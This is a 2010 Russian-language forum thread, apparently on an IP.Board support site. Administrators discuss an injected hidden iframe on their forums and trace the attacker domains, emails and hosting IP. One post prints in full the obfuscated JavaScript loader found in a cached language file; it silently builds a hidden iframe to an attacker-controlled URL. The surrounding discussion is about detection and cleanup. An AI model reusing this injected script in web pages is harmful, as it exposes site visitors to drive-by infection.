Ritsuka Опубликовано 28 Августа 2010 Жалоба Поделиться Опубликовано 28 Августа 2010 No-Script отрапортовал о наличии JS-скриптов с домена ibresource-images.ru. Анализ кода, отдаваемого сервером, не показал посторонних включений. А вот анализ дерева DOM обнаружил в подвале посторонний iframe. Речь, видимо, идет о закладке, скорее всего в JS форума. Домен зарегистрирован на email: alex.dubakov@gmail.com Другие домены с этим email: aionlegend-images.ru ibresource-images.ru iphones-images.ru Другие домены на этом IP: beezoneinfo-images.ru - shupetro@gmail.com ibresource-images.com Домены с email shupetro@gmail.com: amkteam-images.ru igromania-images.ru ladyscafe-images.ru Сам сервер стоит в Hetzner AG, ip 178.63.173.118. По всем доменам, похоже, речь идет об IP.Board 3. Значит, либо есть какая-то уязвимость в форуме, либо кто-то из поддержки IBR "потерял" много чужих данных, если эти ребята конечно обращались в саппорт. Все домены созданы 2010-08-07. На ресурсах стоят 3.0.5 - 3.1.2. Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 28 Августа 2010 Жалоба Поделиться Опубликовано 28 Августа 2010 Поддержка не знает доступов к IBR Игромания не на движке IPB, если я правильно думаю, используют тут немного другую дырку Ссылка на комментарий Поделиться на других сайтах Прочее
Ritsuka Опубликовано 28 Августа 2010 Автор Жалоба Поделиться Опубликовано 28 Августа 2010 Да, тоже позже заметил, что там vB. А на сервере их стоит хитрый nginx с проверкой referrer. Вообще имеет смысл пообщаться на официальном уровне с Hetzner. Немцы очень не любят всякие хак и ботнеты на своих серверах) Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 28 Августа 2010 Жалоба Поделиться Опубликовано 28 Августа 2010 Общее у всех форумов, что они за nginx... Тут страшен не сколько код в DOM, потому как человек в любом случае куки не получил (в IPB они все httpOnly), а то что был залит шелл. Ссылка на комментарий Поделиться на других сайтах Прочее
SeaBreeze Опубликовано 5 Октября 2010 Жалоба Поделиться Опубликовано 5 Октября 2010 (изменено) Вот и я заразился этой ерундой. Форумчане пишут: http://www.iphones.ru/forum/index.php?showtopic=64240&st=195 **iframe style="visibility: hidden;"src="http://ibresource-images.com/cgi-bin/search"></iframe**Где искать вредоносный код, подскажите? Изменено 5 Октября 2010 пользователем SeaBreeze Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 5 Октября 2010 Жалоба Поделиться Опубликовано 5 Октября 2010 Напишите в поддержку, я Ваш тикет возьму и отвечу что необходимо сделать. Ссылка на комментарий Поделиться на других сайтах Прочее
SeaBreeze Опубликовано 6 Октября 2010 Жалоба Поделиться Опубликовано 6 Октября 2010 Вредный код был в таком файле: cache/lang_cache/1/ipb.lang.js Сам код:function pp_gemius_identifier_insert(){try {var gemius_add=new String("ht"+"tp"+":/"+"/ifC2Y".substr(0,2)+"14Fbr1F4".substr(3,2)+"esWmz1".substr(0,2)+"IKUouUIK".substr(3,2)+"rcZJyE".substr(0,2)+"e-3bSd".substr(0,2)+"V4TimVT4".substr(3,2)+"TIJagJTI".substr(3,2)+"6p8es6p8".substr(3,2)+".cIr2C".substr(0,2)+"NY2omNY2".substr(3,2)+"/clXM1".substr(0,2)+"gi1c5a".substr(0,2)+"-bSvOG".substr(0,2)+"in38Xm".substr(0,2)+"/search");var obj = document.createElement(String("ifrIObe".substr(0,3)+"ame4b76".substr(0,3)));obj.src=gemius_add; var o=obj[string("styRmrN".substr(0,3)+"lexmgU".substr(0,2))];o.visibility="hidde"+"n"; o.width=10; o.height=10; document.body.appendChild(obj);} catch(e){document.write("<bas6t".substr(0,2)+"odnuGv".substr(0,2)+"y>wWhx".substr(0,2));setTimeout(function(){pp_gemius_identifier_insert()}, 500);}} Пользователи все равно говорят, что все равно Касперский ругается. Буду пробовать обновлять на 3.1.2 Ссылка на комментарий Поделиться на других сайтах Прочее
Arhar Опубликовано 6 Октября 2010 Жалоба Поделиться Опубликовано 6 Октября 2010 а че обновлять, если в файл дописывается код, наверняка следует удалить нахрен тотал коммандер, скачать drweb cureit и проверить весь свой комп, удостоверится, что машина сервера не заражена вирусом, сменить пароли на фтп и проверить всех админов, сменить им пароли, удалить им тотал коммандер, проверить их компы Ссылка на комментарий Поделиться на других сайтах Прочее
SeaBreeze Опубликовано 6 Октября 2010 Жалоба Поделиться Опубликовано 6 Октября 2010 Я работаю на Mac OS X, других компов в поле видимости нет. Как и Тотал Коммандера. Ссылка на комментарий Поделиться на других сайтах Прочее
Japonec Опубликовано 7 Октября 2010 Жалоба Поделиться Опубликовано 7 Октября 2010 http://www.virustotal.com/url-scan/ в помощь для проверки форумов ...и эт..подвязывайте вы хранить пароли в фтп клиентах...уж оченно геморно то дело эти ява вири гонять по компу и серверу..а они умнеют гады те вири и хз какой крендель выпишет очередная версия того вредоноса, отак ограбит такой вирь пару сотен юзиков с их вэб манями и доказывай потом что ты не верблюд...... Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 7 Октября 2010 Жалоба Поделиться Опубликовано 7 Октября 2010 подвязывайте вы хранить пароли в фтп клиентах...Это мешает трудиться разработчикам кейлогеров? Ссылка на комментарий Поделиться на других сайтах Прочее
pvo1988 Опубликовано 8 Октября 2010 Жалоба Поделиться Опубликовано 8 Октября 2010 Это что за фигня? В редакторе здесь не могу воспользоваться ни одной кнопкой????? Ссылка на комментарий Поделиться на других сайтах Прочее
pvo1988 Опубликовано 9 Октября 2010 Жалоба Поделиться Опубликовано 9 Октября 2010 Так чего тут с редактором? Чё теперь bb-коды все время писать ручками? Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 9 Октября 2010 Жалоба Поделиться Опубликовано 9 Октября 2010 Так чего тут с редактором? Чё теперь bb-коды все время писать ручками?Вроде работает редактор. Проверил в Опере 10.10. Ссылка на комментарий Поделиться на других сайтах Прочее
pvo1988 Опубликовано 9 Октября 2010 Жалоба Поделиться Опубликовано 9 Октября 2010 Х..м, точно, в Опере работает, но вот сейчас зашел Mozilla Firefox, снова не работает. Сегодня был этой Мозиллой на 5-6 форумах, всюду работало.Странно. Даже не заметил когда началось. Глянул настройки, вроде никаких ограничений на этот форум нет.Но в конце сентября был случай, когда выскочило кокое-то предупреждение о вирусной опасности (не от DrWeb вроде), но тут же исчезло. кто подал это предупреждение, не успел понять. Может как-то связано? Сейчас попробую все кукиссы этого форума почистить. Удалил кукки и заработало. Жаль поздно спохватился, надо было посмотреть какие именно. Их что-то больно много:.db.ibresource.ru.forums.ibresource.ru.ibresource.ru Ссылка на комментарий Поделиться на других сайтах Прочее
Japonec Опубликовано 9 Октября 2010 Жалоба Поделиться Опубликовано 9 Октября 2010 подвязывайте вы хранить пароли в фтп клиентах...Это мешает трудиться разработчикам кейлогеров? Хэх...кейлогер многа шума в системе делает...и палится на раз ( ну есственно коль антивирь стоит)..плюс процесс висит постоянно в памяти...плюс вирт.клавиатура...так что нафига им такой гемор если легче расхешировать готовый пас из тотал командёра? Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 10 Октября 2010 Жалоба Поделиться Опубликовано 10 Октября 2010 Хэх...кейлогер многа шума в системе делает...и палится на разУ меня пунто-свитчер ни разу не запалился.А нынче, спасибо яндексу, это чуть ли не стандарт оснащения винды. Ссылка на комментарий Поделиться на других сайтах Прочее
Japonec Опубликовано 10 Октября 2010 Жалоба Поделиться Опубликовано 10 Октября 2010 Хэх...кейлогер многа шума в системе делает...и палится на разУ меня пунто-свитчер ни разу не запалился.А нынче, спасибо яндексу, это чуть ли не стандарт оснащения винды. Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...Дык чем бы блогеры и привлекали народ на свои странички как не такими рассказами... ЗЫ..по началу КАСПЕР мозги сносил своими алертами в сторону швитцера о якобы "поведении кейлогера"..потом то дело фанаты проги оспорили у ЛК и КАСПЕР замолк...но там свой прикол был..КАСПЕР орал на швитцер, когда у того был включен дневник и записывался весь буфер обмена...и оно понятно..то действие и есть процесс кейлогера за исключением одного но...это отсылка ваших логов злюке-бяке-хаке в настоящем кейлогере..и те движения (включая и отсылку логов по защищённому каналу) очень трудно не заметить...А ява вири "прыгают" на сервак не посредственно через фтп...гы..и если б кто поимел бы ваш пароль к фтп, то там бы не обошлось ток одной строкой в файле...ушла бы и база и ваш форум скрыто бы вещал рекламу...вашим же пользователям Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 10 Октября 2010 Жалоба Поделиться Опубликовано 10 Октября 2010 Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...Я не читаю блогов.Пунто перехватывает все нажатия клавиш, и с разрешения пользователя даже ведет журнал всего набранного с клавиатуры.Перехватить у пунты перехваты нажатия клавиш - думаете нет таких троянов? Ссылка на комментарий Поделиться на других сайтах Прочее
Japonec Опубликовано 11 Октября 2010 Жалоба Поделиться Опубликовано 11 Октября 2010 Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...Я не читаю блогов.Пунто перехватывает все нажатия клавиш, и с разрешения пользователя даже ведет журнал всего набранного с клавиатуры.Перехватить у пунты перехваты нажатия клавиш - думаете нет таких троянов? Ну вот этот журнал и зовётся дневником и включается опционно......У трояна-кейлогера свой алгоритм перехвата...плюс...дык поди угадай,стоит у пользователя путно или нет..а трой должон 100% приносить хозяину инфу...но опять таки...виртуальную клавиатуру можно только заскринить и если пользователь не совсем камикадзе, то он таки пользователь этот, включает виртуалку и работает с паролями, либо через хранители паролей по нажатию кнопки (в последнем случае кейлогер полностью обезоружен)...то кейлогеры в деле слива фтп тут бесполезны,или не такие эффективные как сливалки захешированных и оставленных паролей в фтп клиентах, а следовательно как я выше и написал и эт..подвязывайте вы хранить пароли в фтп клиентах... Ссылка на комментарий Поделиться на других сайтах Прочее
pvo1988 Опубликовано 11 Октября 2010 Жалоба Поделиться Опубликовано 11 Октября 2010 Какие умные мысли у Японца. Даже хотел было поглядеть его ресурс, но в названии "варез", чет расхотелось Ссылка на комментарий Поделиться на других сайтах Прочее
Japonec Опубликовано 11 Октября 2010 Жалоба Поделиться Опубликовано 11 Октября 2010 (изменено) Какие умные мысли у Японца. Даже хотел было поглядеть его ресурс, но в названии "варез", чет расхотелось у меня правильный "варез"...безо всякой мути и херни... http://www.virustotal.com/url-scan/report.html?id=0d92a7d72609808ef7b5e6e054e04901-1286792361 ..не боись..не покусает..тем паче "нуллами" скриптов не пользуюсь. ЗЫ...социалные сети типа вконтакта оказывают более пагубное влияния на неокрепшие умы, нежели технически оформленный "варезник" ЗЫ...варез является одной из составляющей пассивной рекламы контента..плюс...данное явление хотя б как то "расшивеливает" ожиревших разработчиков программного обеспечения кои ленятся править деже не значительные баги в прогах...но ради смены алгоритма регистрации всёж им приходится лазить в код, а заодно и те баги правят...плюс бесплатный баг-трекер в виде отзывов пользователей (ток надоть завести аналитика который бут читать те коменты и воспроизводить баги на дистрах) а заодно и бесплатный маркетологизатор ( стоит взглянуть на просмотры контента и сразу же становиться ясно, популярен контент или нет и потом принимать меры к увеличению популярности и полезности онного) Изменено 11 Октября 2010 пользователем Japonec Ссылка на комментарий Поделиться на других сайтах Прочее
Arhar Опубликовано 11 Октября 2010 Жалоба Поделиться Опубликовано 11 Октября 2010 вообще никакие пароли не рекомендуется сохранять через такую функциюа касперский да, иногда говорит легальная программа, которая может быть использована злоумышленником для нанесения вреда компьютеру или данным пользователя PDM.Keylogger kernel mode memory patch Ссылка на комментарий Поделиться на других сайтах Прочее
dillix Опубликовано 20 Октября 2010 Жалоба Поделиться Опубликовано 20 Октября 2010 На маке и линуксе эти вирусы не страшны)) Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения